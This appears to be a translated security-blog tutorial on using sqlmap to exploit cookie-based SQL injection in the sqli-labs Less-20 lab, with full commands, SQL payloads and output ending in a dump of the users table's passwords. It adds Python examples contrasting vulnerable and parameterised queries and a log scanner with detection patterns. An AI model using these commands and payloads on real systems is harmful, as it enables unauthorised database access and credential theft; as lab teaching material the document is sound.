安全矩阵

How to perform cookie injection with sqlmap

Posted on 2021-7-3 10:07:57
Original link: How to perform cookie injection with sqlmap

I. Detecting cookie injection

1. Capture the request with Burp Suite and save the packet contents to 1.txt:

    GET /sqli/Less-20/index.php HTTP/1.1
    Host: 192.168.139.129
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.139.129/sqli/Less-20/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: uname=admin; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    Connection: close

2. Check whether the cookie parameter is injectable:

    sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2

    --cookie: supplies the Cookie header value (here the uname parameter) that sqlmap should test
    --level 2: sqlmap only tests Cookie header parameters at level 2 or above

Output:

    [16:44:49] [INFO] Cookie parameter 'uname' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
    Cookie parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
    ---
    Parameter: uname (Cookie)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: uname=admin' AND 6679=6679 AND 'sdQh'='sdQh; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
        Type: error-based
        Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
        Payload: uname=admin' AND GTID_SUBSET(CONCAT(0x7162717171,(SELECT (ELT(6429=6429,1))),0x717a767a71),6429) AND 'whpT'='whpT; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: uname=admin' AND (SELECT 6802 FROM (SELECT(SLEEP(5)))pIcR) AND 'rFnD'='rFnD; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: uname=-4950' UNION ALL SELECT NULL,CONCAT(0x7162717171,0x4f62636a6e49426b5a415141657259517971566f6463496b714561576f4d58446459787146754d78,0x717a767a71),NULL-- -; PHPSESSID=6t4bb3nb4rarqod4j073m038h4
    ---
    [16:44:55] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.4.45, Nginx 1.15.11
    back-end DBMS: MySQL >= 5.6
    [16:44:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'
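Why sqlmap can call the uname cookie injectable, shown with an added Python/sqlite3 example that is not part of the original post: a lookup that splices the cookie value into the SQL string next to the bound-parameter version, and the TRUE/FALSE cookie pair behind sqlmap's boolean-based blind check (the TRUE payload is the one from the output above). The table contents and the concatenation pattern attributed to Less-20 are assumptions.

```python
import sqlite3

# Constructed stand-in for the security.users table (three of the rows the page dumps).
ROWS = [(1, "Dumb", "Dumb"), (8, "admin", "admin"), (9, "admin1", "admin1")]

# TRUE case: the boolean-based payload from the sqlmap output above.
# FALSE case: the same shape with a condition that does not hold.
TRUE_COOKIE = "admin' AND 6679=6679 AND 'sdQh'='sdQh"
FALSE_COOKIE = "admin' AND 6679=6680 AND 'sdQh'='sdQh"


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, password TEXT, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def lookup_vulnerable(db, uname):
    # Assumed Less-20 pattern: the raw cookie value is pasted into the query text,
    # so quotes and operators inside the cookie become part of the SQL.
    sql = "SELECT username FROM users WHERE username='" + uname + "' LIMIT 1"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def lookup_hardened(db, uname):
    # Bound parameter: the driver passes the cookie value as data, never as SQL text.
    sql = "SELECT username FROM users WHERE username=? LIMIT 1"
    row = db.execute(sql, (uname,)).fetchone()
    return row[0] if row else None


def boolean_pair_differs(lookup):
    """sqlmap's boolean-based blind test in miniature: if the response changes
    between the TRUE and the FALSE cookie, the condition reached the database."""
    db = make_db()
    return lookup(db, TRUE_COOKIE) != lookup(db, FALSE_COOKIE)


if __name__ == "__main__":
    print("vulnerable lookup differs:", boolean_pair_differs(lookup_vulnerable))  # True
    print("hardened lookup differs:", boolean_pair_differs(lookup_hardened))      # False
```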

II. Listing the databases

    sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 --dbs

Output:

    [16:57:57] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx 1.15.11, PHP 5.4.45
    back-end DBMS: MySQL >= 5.6
    [16:57:57] [INFO] fetching database names
    do you want to URL encode cookie values (implementation specific)? [Y/n]
    [16:57:59] [WARNING] reflective value(s) found and filtering out
    available databases [10]:
    [*] challenges
    [*] dvwa
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] pikachu
    [*] security
    [*] sys
    [*] www_dgdg_com
    [*] www_zm_com
    [16:57:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

III. Listing the tables

    sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security --tables

Output:

    [17:05:15] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.4.45, Nginx 1.15.11
    back-end DBMS: MySQL >= 5.6
    [17:05:15] [INFO] fetching tables for database: 'security'
    do you want to URL encode cookie values (implementation specific)? [Y/n]
    [17:05:16] [WARNING] reflective value(s) found and filtering out
    Database: security
    [4 tables]
    +----------+
    | emails   |
    | referers |
    | uagents  |
    | users    |
    +----------+
    [17:05:16] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

IV. Listing the column names

    sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --columns

Output:

    [17:07:37] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.4.45, Nginx 1.15.11
    back-end DBMS: MySQL >= 5.6
    [17:07:37] [INFO] fetching columns for table 'users' in database 'security'
    do you want to URL encode cookie values (implementation specific)? [Y/n]
    [17:07:38] [WARNING] reflective value(s) found and filtering out
    Database: security
    Table: users
    [3 columns]
    +----------+-------------+
    | Column   | Type        |
    +----------+-------------+
    | id       | int(3)      |
    | password | varchar(20) |
    | username | varchar(20) |
    +----------+-------------+
    [17:07:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

V. Dumping the column contents

    sqlmap -r /home/aiyou/桌面/1.txt --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"

Note that --dump takes no argument of its own; columns are selected with -C (for example -C username,password --dump). As run here the whole table was dumped, which is why all three columns appear in the output.

Output:

    [17:09:08] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.4.45, Nginx 1.15.11
    back-end DBMS: MySQL >= 5.6
    [17:09:08] [INFO] fetching columns for table 'users' in database 'security'
    [17:09:08] [INFO] fetching entries for table 'users' in database 'security'
    do you want to URL encode cookie values (implementation specific)? [Y/n]
    [17:09:09] [WARNING] reflective value(s) found and filtering out
    Database: security
    Table: users
    [13 entries]
    +----+------------+----------+
    | id | password   | username |
    +----+------------+----------+
    | 1  | Dumb       | Dumb     |
    | 2  | I-kill-you | Angelina |
    | 3  | p@ssword   | Dummy    |
    | 4  | crappy     | secure   |
    | 5  | stupidity  | stupid   |
    | 6  | genious    | superman |
    | 7  | mob!le     | batman   |
    | 8  | admin      | admin    |
    | 9  | admin1     | admin1   |
    | 10 | admin2     | admin2   |
    | 11 | admin3     | admin3   |
    | 12 | dumbo      | dhakkan  |
    | 14 | admin4     | admin4   |
    +----+------------+----------+
    [17:09:09] [INFO] table 'security.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.139.129/dump/security/users.csv'
    [17:09:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.139.129'

VI. Another way to test for cookie injection

The same steps work without a saved request file: give the target URL with -u and the cookie with --cookie, and the remaining options are unchanged.

1. Check whether injection is present:

    sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2

2. List the database names:

    sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 --dbs

3. List the table names:

    sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security --tables

4. List the column names:

    sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --columns

5. Dump the column contents:

    sqlmap -u "http://192.168.139.129/sqli/Less-20/index.php" --cookie "uname=admin" --level 2 -D security -T users --dump "username,password"
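The defender's view of the same traffic, as an added Python example that is not part of the original post: a scan over constructed access-log lines that record the Cookie header, flagging the four payload shapes sqlmap reported for uname above (boolean-based, GTID_SUBSET error-based, SLEEP time-based, UNION). The log format with a trailing cookie="..." field, the client address and the sample lines are all assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# One signature per technique sqlmap reported for the uname cookie on this page.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s+AND\s+\d+=\d+\s+AND\s+'", re.I),
    "error-based (GTID_SUBSET)": re.compile(r"\bGTID_SUBSET\s*\(", re.I),
    "time-based blind (SLEEP)": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "UNION query": re.compile(r"\bUNION\s+ALL\s+SELECT\b", re.I),
}

# Assumed log format: each access-log line ends with a cookie="$http_cookie" field.
COOKIE_FIELD = re.compile(r'cookie="([^"]*)"')


def classify_cookie(cookie_header):
    """Return the techniques whose signature appears in the Cookie header.
    sqlmap URL-encodes cookie values (the 'URL encode cookie values?' prompt in
    the output above), so the header is decoded before matching."""
    decoded = unquote(cookie_header)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return a list of (line number, technique) for every line whose cookie matches."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = COOKIE_FIELD.search(line)
        if match:
            for technique in classify_cookie(match.group(1)):
                hits.append((number, technique))
    return hits


# Constructed sample log: requests to the page's target path from an assumed client.
PREFIX = ('10.0.0.5 - - [03/Jul/2021:16:44:49 +0800] '
          '"GET /sqli/Less-20/index.php HTTP/1.1" 200 1432 cookie="')
SAMPLE_LOG = [PREFIX + cookie + '"' for cookie in (
    "uname=admin; PHPSESSID=6t4bb3nb4rarqod4j073m038h4",
    "uname=admin%27%20AND%206679%3D6679%20AND%20%27sdQh%27%3D%27sdQh; PHPSESSID=6t4bb3nb4rarqod4j073m038h4",
    "uname=admin' AND GTID_SUBSET(CONCAT(0x71,(SELECT 1)),6429) AND 'whpT'='whpT",
    "uname=admin' AND (SELECT 6802 FROM (SELECT(SLEEP(5)))pIcR) AND 'rFnD'='rFnD",
    "uname=-4950' UNION ALL SELECT NULL,CONCAT(0x71,0x4f62,0x71),NULL-- -",
)]

if __name__ == "__main__":
    for number, technique in scan_log(SAMPLE_LOG):
        print(f"line {number}: {technique}")
```

The first sample line is the benign request from the captured packet and produces no hit; each of the other four matches exactly one technique.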

